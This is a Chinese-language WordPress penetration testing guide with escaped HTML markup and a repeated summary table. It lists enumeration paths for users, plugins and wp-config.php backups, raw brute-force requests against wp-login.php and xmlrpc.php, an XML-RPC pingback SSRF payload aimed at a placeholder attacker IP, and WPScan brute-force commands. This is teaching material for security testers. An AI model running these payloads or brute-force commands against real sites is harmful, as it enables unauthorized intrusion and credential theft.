WordPress渗透测试权威指南<\/strong><\/h3>
一、前言<\/strong><\/h4>
WordPress作为全球最流行的内容管理系统（CMS），因其广泛的使用而成为渗透测试中的常见目标。本指南旨在系统化地阐述当渗透测试遇到WordPress站点时的完整测试流程、关键信息收集方法、常见攻击向量以及自动化工具的使用。<\/p>
二、信息收集与枚举<\/strong><\/h4>
信息收集是渗透测试成功的基础。对于WordPress，需要重点关注以下几个方面：<\/p>
1. 核心版本识别<\/strong><\/p>

方法一（Feed）：<\/strong> 访问 https:\/\/target.com\/feed<\/code> 或 https:\/\/target.com\/?feed=rss2<\/code>，查看页面源代码，通常包含生成Feed的WordPress版本信息。<\/li>
方法二（其他文件）：<\/strong> 检查诸如 readme.html<\/code>、wp-includes\/version.php<\/code> 等文件，但这些文件可能被管理员移除。<\/li> <\/ul> 2. 插件与主题枚举<\/strong><\/p> 插件版本信息：<\/strong> 插件目录下的 readme.txt<\/code> 文件是版本信息的主要来源。尝试访问以下路径（PLUGINNAME<\/code> 替换为具体插件名）： \/wp-content\/plugins\/PLUGINNAME\/readme.txt<\/code><\/li> \/wp-content\/plugins\/PLUGINNAME\/readme.TXT<\/code><\/li> \/wp-content\/plugins\/PLUGINNAME\/README.txt<\/code><\/li> \/wp-content\/plugins\/PLUGINNAME\/README.TXT<\/code><\/li> <\/ul> <\/li> 主题版本信息：<\/strong> 主题的 style.css<\/code> 文件头部通常包含版本信息。 \/wp-content\/themes\/THEMENAME\/style.css<\/code><\/li> 同样可以检查主题目录下的 readme.txt<\/code> 文件。<\/li> <\/ul> <\/li> <\/ul> 3. 用户枚举<\/strong><\/p> 方法一（作者参数）：<\/strong> 访问 https:\/\/target.com\/?author=1<\/code>。系统通常会重定向到作者文章页面，URL中会暴露用户名（如 https:\/\/target.com\/author\/username\/<\/code>）。<\/li> 方法二（REST API）：<\/strong> WordPress的REST API可能会暴露用户信息。 https:\/\/target.com\/wp-json\/wp\/v2\/users<\/code><\/li> https:\/\/target.com\/?rest_route=\/wp\/v2\/users<\/code><\/li> <\/ul> <\/li> <\/ul> 4. 敏感文件与备份查找<\/strong><\/p> 配置文件（wp-config.php）备份：<\/strong> 该文件包含数据库凭据等核心敏感信息。查找其备份或临时文件： \/.wp-config.php.swp<\/code> (Vim备份文件)<\/li> \/wp-config.php.bak<\/code><\/li> \/wp-config.php.old<\/code><\/li> \/wp-config.php.save<\/code><\/li> \/wp-config.php.dist<\/code><\/li> \/wp-config.txt<\/code><\/li> \/wp-config.php~<\/code><\/li> <\/ul> <\/li> 调试日志：<\/strong> 如果启用了调试模式，可能会存在日志文件，其中包含敏感信息。 \/wp-content\/debug.log<\/code><\/li> <\/ul> <\/li> 注册功能：<\/strong> 检查是否开放用户注册，这可能是一个攻击入口。 https:\/\/target.com\/wp-login.php?action=register<\/code><\/li> <\/ul> <\/li> <\/ul> 三、漏洞利用与攻击手法<\/strong><\/h4> 1. 密码爆破<\/strong><\/p> 目标接口：<\/strong> 后台登录接口 (\/wp-login.php<\/code>) 或 XML-RPC 接口 (\/xmlrpc.php<\/code>)。<\/li> 针对 \/wp-login.php<\/code> 的POST请求示例：<\/strong> POST<\/span> \/wp-login.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>log=admin&pwd=[密码字典]&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 <\/span><\/span><\/code><\/pre><\/li> 针对 \/xmlrpc.php<\/code> 的POST请求示例（效率更高，可绕过某些登录限制）：<\/strong> POST \/xmlrpc.php HTTP\/1.1 <\/span><\/span>Host: target.com <\/span><\/span>Content-Type: application\/xml <\/span><\/span> <\/span><\/span><?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><methodCall><\/span> <\/span><\/span> <methodName><\/span>wp.getUsersBlogs<\/methodName><\/span> <\/span><\/span> <params><\/span> <\/span><\/span> <param><value><\/span>admin<\/value><\/param><\/span> <\/span><\/span> <param><value><\/span>[密码字典]<\/value><\/param><\/span> <\/span><\/span> <\/params><\/span> <\/span><\/span><\/methodCall><\/span> <\/span><\/span><\/code><\/pre> 如果凭证正确，响应中会包含博客信息；错误则返回403错误。<\/li> <\/ul> <\/li> <\/ul> 2. 服务器端请求伪造（SSRF）<\/strong><\/p> 利用接口：<\/strong> XML-RPC 接口的 pingback.ping<\/code> 方法。<\/li> 攻击载荷示例：<\/strong> POST \/xmlrpc.php HTTP\/1.1 <\/span><\/span>Host: target.com <\/span><\/span>Content-Type: application\/xml <\/span><\/span> <\/span><\/span><methodCall><\/span> <\/span><\/span> <methodName><\/span>pingback.ping<\/methodName><\/span> <\/span><\/span> <params><\/span> <\/span><\/span> <param><value><string><\/span>http:\/\/[你的IP]:[你的端口]<\/string><\/value><\/param><\/span> <\/span><\/span> <param><value><string><\/span>https:\/\/target.com><\/string><\/value><\/param><\/span> <\/span><\/span> <\/params><\/span> <\/span><\/span><\/methodCall><\/span> <\/span><\/span><\/code><\/pre> 如果漏洞存在，目标服务器会向你指定的IP和端口发起HTTP请求。<\/li> <\/ul> <\/li> <\/ul> 3. 已知漏洞（CVE）利用<\/strong><\/p> 漏洞库：<\/strong> 访问 https:\/\/wpscan.com<\/code> 查询核心、插件和主题的已知漏洞。 WordPress核心漏洞列表： https:\/\/wpscan.com\/wordpresses\/<\/code><\/li> 插件漏洞列表： https:\/\/wpscan.com\/plugins\/<\/code><\/li> <\/ul> <\/li> 利用流程：<\/strong> 通过信息收集获取插件\/主题名称和版本（例如：wp-file-manager<\/code> 版本 6.0<\/code>）。<\/li> 在WPScan数据库中搜索该插件（例如：https:\/\/wpscan.com\/plugin\/wp-file-manager\/<\/code>）。<\/li> 查找影响该版本的公开漏洞（例如：著名的 wp-file-manager<\/code> 插件RCE漏洞 CVE-2020-25213）。<\/li> 根据找到的漏洞详情和公开的Expolit进行测试。<\/li> <\/ol> <\/li> <\/ul> 四、自动化工具辅助<\/strong><\/h4> 1. WPScan<\/strong> WPScan是专为WordPress安全审计设计的黑盒扫描器，内嵌了漏洞数据库。<\/p> 基本扫描：<\/strong> wpscan --url http:\/\/target.com\/<\/code><\/li> 枚举功能：<\/strong> 枚举用户：<\/strong> wpscan --url http:\/\/target.com\/ --enumerate u<\/code><\/li> 枚举插件：<\/strong> wpscan --url http:\/\/target.com\/ --enumerate p<\/code><\/li> 枚举主题：<\/strong> wpscan --url http:\/\/target.com\/ --enumerate t<\/code><\/li> 枚举Timthumb（易受攻击的脚本）：<\/strong> wpscan --url http:\/\/target.com\/ --enumerate tt<\/code><\/li> <\/ul> <\/li> 密码爆破：<\/strong> wpscan --url http:\/\/target.com\/ --wordlist \/path\/to\/password.txt --username admin<\/code><\/li> <\/ul> <\/li> <\/ul> 2. Nuclei<\/strong> Nuclei是一个基于模板的快速漏洞扫描器，拥有大量社区维护的WordPress相关检测模板。<\/p> 基本使用：<\/strong> nuclei -u https:\/\/target.com\/<\/code><\/li> 针对性扫描：<\/strong> 可以指定只运行WordPress相关的模板，提高效率。<\/li> <\/ul> 五、关键点总结与备忘清单<\/strong><\/h4> 类别<\/th> 关键路径\/方法<\/th> 目的<\/th> <\/tr> <\/thead> 信息收集<\/strong><\/td> \/?author=1<\/code>， \/wp-json\/wp\/v2\/users<\/code><\/td> 枚举用户名<\/td> <\/tr> <\/td> \/wp-content\/plugins\/PLUGINNAME\/readme.txt<\/code><\/td> 获取插件版本<\/td> <\/tr> <\/td> \/wp-content\/themes\/THEMENAME\/style.css<\/code><\/td> 获取主题版本<\/td> <\/tr> <\/td> \/.wp-config.php.bak<\/code>, \/.wp-config.php.swp<\/code> 等<\/td> 查找配置文件备份<\/td> <\/tr> <\/td> \/wp-content\/debug.log<\/code><\/td> 查找调试日志<\/td> <\/tr> 攻击面<\/strong><\/td> \/wp-login.php<\/code><\/td> 后台登录、密码爆破<\/td> <\/tr> <\/td> \/xmlrpc.php<\/code><\/td> 密码爆破、SSRF<\/td> <\/tr> <\/td> ?action=register<\/code><\/td> 检查用户注册功能<\/td> <\/tr> 漏洞研究<\/strong><\/td> https:\/\/wpscan.com\/<\/code><\/td> 查询WordPress核心、插件、主题的CVE漏洞<\/td> <\/tr> 工具使用<\/strong><\/td> wpscan --url ... --enumerate u,p,t<\/code><\/td> 自动化枚举<\/td> <\/tr> <\/td> nuclei -u ...<\/code><\/td> 快速漏洞检测<\/td> <\/tr> <\/tbody> <\/table> 重要提醒：<\/strong> 所有渗透测试活动都必须在获得明确授权的前提下进行，并严格遵守相关法律法规。本指南仅用于安全教学和研究目的。<\/p>

类别<\/th>	关键路径\/方法<\/th>	目的<\/th> <\/tr> <\/thead>
信息收集<\/strong><\/td>	`\/?author=1<\/code>， \/wp-json\/wp\/v2\/users<\/code><\/td>`	枚举用户名<\/td> <\/tr>
<\/td>	`\/wp-content\/plugins\/PLUGINNAME\/readme.txt<\/code><\/td>`	获取插件版本<\/td> <\/tr>
<\/td>	`\/wp-content\/themes\/THEMENAME\/style.css<\/code><\/td>`	获取主题版本<\/td> <\/tr>
<\/td>	`\/.wp-config.php.bak<\/code>, \/.wp-config.php.swp<\/code> 等<\/td>`	查找配置文件备份<\/td> <\/tr>
<\/td>	`\/wp-content\/debug.log<\/code><\/td>`	查找调试日志<\/td> <\/tr>
攻击面<\/strong><\/td>	`\/wp-login.php<\/code><\/td>`	后台登录、密码爆破<\/td> <\/tr>
<\/td>	`\/xmlrpc.php<\/code><\/td>`	密码爆破、SSRF<\/td> <\/tr>
<\/td>	`?action=register<\/code><\/td>`	检查用户注册功能<\/td> <\/tr>
漏洞研究<\/strong><\/td>	`https:\/\/wpscan.com\/<\/code><\/td>`	查询WordPress核心、插件、主题的CVE漏洞<\/td> <\/tr>
工具使用<\/strong><\/td>	`wpscan --url ... --enumerate u,p,t<\/code><\/td>`	自动化枚举<\/td> <\/tr>
<\/td>	`nuclei -u ...<\/code><\/td>`	快速漏洞检测<\/td> <\/tr> <\/tbody> <\/table> 重要提醒：<\/strong> 所有渗透测试活动都必须在获得明确授权的前提下进行，并严格遵守相关法律法规。本指南仅用于安全教学和研究目的。<\/p>